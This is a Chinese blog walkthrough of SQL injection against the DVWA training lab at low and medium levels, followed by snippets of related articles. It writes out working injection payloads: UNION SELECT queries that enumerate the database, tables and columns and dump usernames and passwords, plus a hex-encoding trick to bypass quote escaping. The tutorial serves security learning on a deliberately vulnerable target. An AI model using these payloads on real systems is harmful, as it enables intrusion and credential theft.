DVWA_SQL注入低中等级讲解

最新推荐文章于 2024-06-09 10:49:06 发布
最新推荐文章于 2024-06-09 10:49:06 发布
阅读量1k 收藏 12
点赞数 3
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Keiltest/article/details/126269629
版权

首先需要我们了解一下SQL注入的原理是什么:所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串.

SQL注入分为:数字型  字符型  报错注入  Boollean注入  时间盲注

再来了解一些基本的SQL查询语言: 创建库
create database db1;
创建库是否存在,不存在则创建
create database if not exists db1;
查看所有数据库
show databases;
查看某个数据库的定义信息 
show create database db1; 
修改数据库字符信息
alter database db1 character set utf8; 
删除数据库
drop database db1; 

之后开始操作

应该先判断是数字型注入还是字符型注入

输入1返回正确值

 我们再输入1'发现报错

 我们再输入1' and '1' ='1返回正确值

 由此我们可以发现他是字符型注入

我们在来判断字段数1' order by 1#

 再来1' order by 2# 以此类推直到报错就有几列

第3次报错说明只有两列

再来判断回显位置1' union select 1,2#

之后判断数据库1'union select 1,database()# 

 判断表名1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #

判断字段名 1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

 获取数据1' union select user,password from users # 

 low难度完成

把难度改为medium

其实medium就比low多了个抓包在bp中完成SQL注入就可以绕过防御

抓包后判断注入

 修改ID为1 or 1=1 #

 成功返回

 判断为数字型注入

之后与low相同在bp中就可以绕过防御

只有获取字段名时单引号被转义变成\'

可以用16进制绕过1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #,

Keiltest
关注
  • 3
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
DVWA-SQL注入
WY92139010的博客
05-03 962
DVWA-SQL注入 一、SQL注入概念 SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 二、手工注入常规思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 三、DVWA注入分...
DVWASQL注入
qq_46416934的博客
07-29 1242
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
DVWA--sql手工注入(中级)
firecjh的博客
06-09 1062
前端页面设置了下拉选择表单,以此来控制用户的输入。模块对‘users’进行编码。
dvwa SQl注入中级、高级(使用sqlmap渗透)
m0_72904009的博客
06-09 739
dvwa SQl注入中级、高级(使用sqlmap渗透)
DVWA-SQL注入(SQL Injection)低/中/高级别
热门推荐
wangyuxiang946的博客
08-14 1万+
DVWA是一个用来联系渗透的靶场,其中包含数个漏洞模块,本篇博客向大家简单介绍下SQL注入(SQL Injection)模块三个级别(low/medium/high)的通关步骤 SQL Injection-low级别 SQL注入的low级别需要我们输入用户的ID作为参数,后端的SQL语句根据用户ID查询用户的信息并返回,执行SQL之前并没有过滤,源码如下 我们输入一个正确的用户ID : 1 , 发现输入的参数拼接到了url地址栏中,由此推断,此关卡使用的请求方式为GET请求,我们直接在输.
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 814
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
Kali linux在DVWA靶场的SQL注入
qq_74298120的博客
06-20 1846
SQL注入是一种常见的攻击方式,攻击者通过利用Web应用程序或其他应用程序对数据库的查询进行注入,掌控数据库系统,甚至控制整个应用程序。为了加强Web应用程序的安全性,学习SQL注入攻击技能的同时也要了解防御措施。
DVWA下的SQL注入
07-25
SQL
DVWASQL注入低中高级)
qq_43455259的博客
01-20 4792
dvwasql注入
DVWASQL注入
随 风
10-27 3044
一、SQL注入原理 二、SQL注入分类 1、按照数据提交方式分类 (1)GET 注入 (2)POST 注入 (3)Cookie 注入 (4)HTTP 头部注入 2、按照注入点分类 (1)数字型注入点 (2)字符型注入点 (3)搜索型注入点 3、按照执行效果分类 (1)基于布尔的盲注 (2)基于时间的盲注 (3)基于报错的注入 (4)联合查询注入 (5)堆叠注入 (6)宽字节注入 三、SQL注入流程 (1)判断是否存在注入,是数字型还是字符型 (2)猜解SQL查询语句中的字段数 (3)确定显示位置 (4)获取
DAY5 DVWASQL注入演练(low)
weixin_34315485的博客
06-01 136
1、设置 把安全等级先调整为low,让自己获得点信心,免得一来就被打脸。 2、测试和分析页面的功能这里有一个输入框 根据上面的提示,输入用户的id。然后我们输入之后,发现它返回了关于这个user的信息!这里我们输入了“1”。 它返回三行数据,一行是我们输入的用户ID。一行是用户名,另外一行是用户别名。同时,看一下浏览器的地址栏那里,发现url成这样了 这里有...
DVWA sql注入(低中高)
m0_73581247的博客
04-08 437
这样我们就能得到和上面初级一样的内容,接下来的和初级类似。因为这里对一些字符进行了转义,需要使用HEX进行转义。都说手动注入烦,直接sqlmap一把梭哈。偶然发现sqlmap还有解密功能。这里我感觉和第一关差不多。太简单了,只给出代码。我就不抓了直接给代码。
DVWA (Dam Vulnerable Web Application)中级SQL注入实战
baidu_33260220的博客
11-07 4689
1、输入’ or 1=1 #  ,发现’被转义成\’    ‘ “  \ 都被转义加\ 2、输入1 or 1=1 #  ,发现有数字型注入  3、输入1 order by 2判断有两个字段,输入1 union select 1,2 #判断两个字段都可以代入参数进行查询     4、输入1 union select user(),datab
DVWA SQL注入低中高三级)
Yanug
09-26 1749
low级 1.先进行简单的ID查询 输入输入正确的ID,将显示ID First name,Surname信息。 2.检测是否可以注入 可知此位为注入点,输入:‘ 返回错误 3.尝试遍历数据库表,提示输入的值是ID,可以初步判断此处为数字类型的注入。 尝试输入:1 or 1=1 没有达到目的,再尝试:1' or' 1' =' 1 显示出数据库中所有内容。 4.查询字段数 1’order by...
SQL注入中级
BlueSky216的博客
07-20 439
sql注入数据库的判断 1、识别数据库 利用web应用技术帮我们判断: ASP和.NET:Microsoft SQL Server PHP : MySQL、PostgreSQL Java : Oracle、MySQL Web容器也给我们提供了线索,比如安装IIS作为服务器平台,后台数据及很有可能是Microsoft SQL Server,而允许Apache和PHP的Linux服务
DVWA-SQL注入(全级别)
小纯的博客
02-08 6373
一、SQL注入概念 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 二、手工注入常规思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 ...
DVWASQL注入LOW与Medium
ANDTM的博客
04-10 802
这里我们重点看前几行代码,大概意思就是当我们呈递的东西不为空是,就会把我们呈递的东西赋值给id(代码中蓝色的),此时右边的id(代码中红色的,即加引号的)就是我们输入的东西,没有任何的过滤机制。而在数据库执行时,如select email from member where id=$id,其中 $id 为 我们输入的值 ,如果 输入 1 or 1=1 ,则变成select email from member where id=1 or 1=1 ,SQL注入大概就是这个原理。
DVWAsql注入
最新发布
07-10
DVWA(Damn Vulnerable Web Application)是一个开源的安全教育工具,用于演示常见的Web应用程序安全漏洞,包括SQL注入SQL注入是指攻击者通过精心构造的SQL查询字符串,将恶意代码插入到网站的SQL查询中,意图欺骗数据库管理系统执行非授权操作,如读取、修改或删除数据。 在DVWASQL Injection部分,用户通常需要提交一些输入数据,比如搜索条件。如果这个输入未经充分验证和清理就直接用于构建SQL查询,那么恶意用户可能会输入特殊字符,使得原本用于检索信息的查询变成了对数据库结构或敏感数据的探索。例如,攻击者可能会尝试添加`' OR '1'='1; --`这样的额外内容,导致服务器返回所有记录,甚至更多。 为了防止SQL注入,应使用预处理语句、参数化查询或者对用户输入进行严格的转义和验证。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值